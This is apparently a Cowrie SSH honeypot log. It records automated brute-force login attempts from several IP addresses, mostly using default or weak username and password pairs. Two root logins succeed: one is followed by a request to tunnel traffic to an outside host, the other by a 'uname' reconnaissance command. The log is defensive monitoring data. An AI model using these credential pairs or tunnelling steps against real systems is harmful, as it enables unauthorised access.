{"eventid":"cowrie.login.failed","username":"admin","password":"4321","message":"login attempt [admin/4321] failed","sensor":"my-vps","timestamp":"2025-08-26T21:53:17.868902Z","src_ip":"212.227.235.229","session":"450b20bfc0b2"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:53:19.693047Z","src_ip":"212.227.235.229","session":"450b20bfc0b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41412,"dst_ip":"1.2.3.4","dst_port":22,"session":"987759bc3446","protocol":"ssh","message":"New connection: 212.227.125.160:41412 (1.2.3.4:22) [session: 987759bc3446]","sensor":"my-vps","timestamp":"2025-08-26T21:53:20.935938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:53:20.963464Z","src_ip":"212.227.125.160","session":"987759bc3446"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:53:20.995118Z","src_ip":"212.227.125.160","session":"987759bc3446"}
{"eventid":"cowrie.login.failed","username":"deployer","password":"deployer","message":"login attempt [deployer/deployer] failed","sensor":"my-vps","timestamp":"2025-08-26T21:53:21.287052Z","src_ip":"212.227.125.160","session":"987759bc3446"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:53:22.334070Z","src_ip":"212.227.125.160","session":"987759bc3446"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36796,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff3203a0c5c2","protocol":"ssh","message":"New connection: 212.227.125.160:36796 (1.2.3.4:22) [session: ff3203a0c5c2]","sensor":"my-vps","timestamp":"2025-08-26T21:53:26.488491Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:53:26.489764Z","src_ip":"212.227.125.160","session":"ff3203a0c5c2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:53:26.534835Z","src_ip":"212.227.125.160","session":"ff3203a0c5c2"}
{"eventid":"cowrie.login.failed","username":"docubeapp-usr","password":"docubeapp-usr","message":"login attempt [docubeapp-usr/docubeapp-usr] failed","sensor":"my-vps","timestamp":"2025-08-26T21:53:26.752492Z","src_ip":"212.227.125.160","session":"ff3203a0c5c2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:53:28.051101Z","src_ip":"212.227.125.160","session":"ff3203a0c5c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60418,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bdc642dcc1c","protocol":"ssh","message":"New connection: 212.227.125.160:60418 (1.2.3.4:22) [session: 7bdc642dcc1c]","sensor":"my-vps","timestamp":"2025-08-26T21:53:32.036950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:53:32.037843Z","src_ip":"212.227.125.160","session":"7bdc642dcc1c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:53:32.097748Z","src_ip":"212.227.125.160","session":"7bdc642dcc1c"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-26T21:53:32.269590Z","src_ip":"212.227.125.160","session":"7bdc642dcc1c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:53:33.499116Z","src_ip":"212.227.125.160","session":"7bdc642dcc1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55804,"dst_ip":"1.2.3.4","dst_port":22,"session":"be3862f8ef7a","protocol":"ssh","message":"New connection: 212.227.125.160:55804 (1.2.3.4:22) [session: be3862f8ef7a]","sensor":"my-vps","timestamp":"2025-08-26T21:53:37.584731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:53:37.586286Z","src_ip":"212.227.125.160","session":"be3862f8ef7a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:53:37.644185Z","src_ip":"212.227.125.160","session":"be3862f8ef7a"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:53:37.840465Z","src_ip":"212.227.125.160","session":"be3862f8ef7a"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:53:38.929029Z","src_ip":"212.227.125.160","session":"be3862f8ef7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":26314,"dst_ip":"1.2.3.4","dst_port":22,"session":"b95c5f953309","protocol":"ssh","message":"New connection: 212.227.235.229:26314 (1.2.3.4:22) [session: b95c5f953309]","sensor":"my-vps","timestamp":"2025-08-26T21:53:39.716927Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:53:39.718029Z","src_ip":"212.227.235.229","session":"b95c5f953309"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":26681,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9a1cc4078bb","protocol":"ssh","message":"New connection: 212.227.235.229:26681 (1.2.3.4:22) [session: b9a1cc4078bb]","sensor":"my-vps","timestamp":"2025-08-26T21:53:39.819861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:53:39.820721Z","src_ip":"212.227.235.229","session":"b9a1cc4078bb"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T21:53:39.952237Z","src_ip":"212.227.235.229","session":"b9a1cc4078bb"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:53:40.348958Z","src_ip":"212.227.235.229","session":"b9a1cc4078bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T21:53:40.481581Z","session":"b9a1cc4078bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51190,"dst_ip":"1.2.3.4","dst_port":22,"session":"69b4db540b33","protocol":"ssh","message":"New connection: 212.227.125.160:51190 (1.2.3.4:22) [session: 69b4db540b33]","sensor":"my-vps","timestamp":"2025-08-26T21:53:43.167424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:53:43.169003Z","src_ip":"212.227.125.160","session":"69b4db540b33"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:53:43.222729Z","src_ip":"212.227.125.160","session":"69b4db540b33"}
{"eventid":"cowrie.login.failed","username":"sem7","password":"sem7","message":"login attempt [sem7/sem7] failed","sensor":"my-vps","timestamp":"2025-08-26T21:53:43.441710Z","src_ip":"212.227.125.160","session":"69b4db540b33"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:53:44.494749Z","src_ip":"212.227.125.160","session":"69b4db540b33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46580,"dst_ip":"1.2.3.4","dst_port":22,"session":"602a99d76ed8","protocol":"ssh","message":"New connection: 212.227.125.160:46580 (1.2.3.4:22) [session: 602a99d76ed8]","sensor":"my-vps","timestamp":"2025-08-26T21:53:48.825007Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:53:48.852043Z","src_ip":"212.227.125.160","session":"602a99d76ed8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:53:48.869146Z","src_ip":"212.227.125.160","session":"602a99d76ed8"}
{"eventid":"cowrie.login.failed","username":"mehdi","password":"123456","message":"login attempt [mehdi/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:53:49.044047Z","src_ip":"212.227.125.160","session":"602a99d76ed8"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:53:50.096815Z","src_ip":"212.227.125.160","session":"602a99d76ed8"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51232,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e7ffa7b8e6d","protocol":"ssh","message":"New connection: 217.72.205.35:51232 (1.2.3.4:22) [session: 7e7ffa7b8e6d]","sensor":"my-vps","timestamp":"2025-08-26T21:53:50.306921Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:53:50.307963Z","src_ip":"217.72.205.35","session":"7e7ffa7b8e6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41968,"dst_ip":"1.2.3.4","dst_port":22,"session":"297c5c1b2dea","protocol":"ssh","message":"New connection: 212.227.125.160:41968 (1.2.3.4:22) [session: 297c5c1b2dea]","sensor":"my-vps","timestamp":"2025-08-26T21:53:53.975813Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:53:53.976795Z","src_ip":"212.227.125.160","session":"297c5c1b2dea"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:53:54.108248Z","src_ip":"212.227.125.160","session":"297c5c1b2dea"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:53:54.550820Z","src_ip":"212.227.125.160","session":"297c5c1b2dea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:53:54.692384Z","src_ip":"212.227.125.160","session":"297c5c1b2dea"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:53:54.693053Z","src_ip":"212.227.125.160","session":"297c5c1b2dea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:53:54.756055Z","src_ip":"212.227.125.160","session":"297c5c1b2dea"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:53:54.757170Z","src_ip":"212.227.125.160","session":"297c5c1b2dea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37356,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd5ab8173657","protocol":"ssh","message":"New connection: 212.227.125.160:37356 (1.2.3.4:22) [session: bd5ab8173657]","sensor":"my-vps","timestamp":"2025-08-26T21:53:59.983286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:53:59.984214Z","src_ip":"212.227.125.160","session":"bd5ab8173657"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:54:00.033847Z","src_ip":"212.227.125.160","session":"bd5ab8173657"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-26T21:54:00.186690Z","src_ip":"212.227.125.160","session":"bd5ab8173657"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:54:01.238530Z","src_ip":"212.227.125.160","session":"bd5ab8173657"}
